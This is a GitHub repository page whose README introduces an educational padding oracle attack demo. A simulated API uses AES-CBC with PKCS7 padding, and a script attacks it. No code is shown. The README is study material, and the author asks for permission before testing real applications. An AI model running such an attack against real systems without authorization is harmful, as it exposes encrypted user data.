Padding Oracle Example

This repository contains a simple example of a padding oracle attack on a vulnerable API.

Code

vulnerable_api.py : this code simulates a vulnerable API susceptible to the padding oracle attack.
padding_oracle.py this script performs a Padding Oracle Attack in the vulnerable API.

Attack Scenario

The attacker has access to a valid payload (IV + encrypted blocks).
The attacker can use a request function that simulates interaction with a vulnerable API. Specifically, the function returns True if a given payload can be decrypted and False otherwise.
The encryption algorithm used by the API is vulnerable to a padding oracle attack. In this case, the API uses AES in CBC mode with PKCS7 padding.

Usage

To run the example just cd into the cloned repository and execute

python3 padding_oracle.py

Note

I wrote this code to better understand the algorithm behind padding oracle attacks. It is not optimized, but it is useful for learning. If you want to test a padding oracle attack against an application (with permission, of course), consider using other tools like padre.

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
README.md		README.md
padding_oracle.py		padding_oracle.py
vulnerable_api.py		vulnerable_api.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Uh oh!

Repository files navigation

Padding Oracle Example

Code

Attack Scenario

Usage

Note

About

Uh oh!

Releases

Packages

Languages

Uh oh!

Uh oh!

davimoreno/padding_oracle_example

Folders and files

Latest commit

History

Repository files navigation

Padding Oracle Example

Code

Attack Scenario

Usage

Note

About

Topics

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages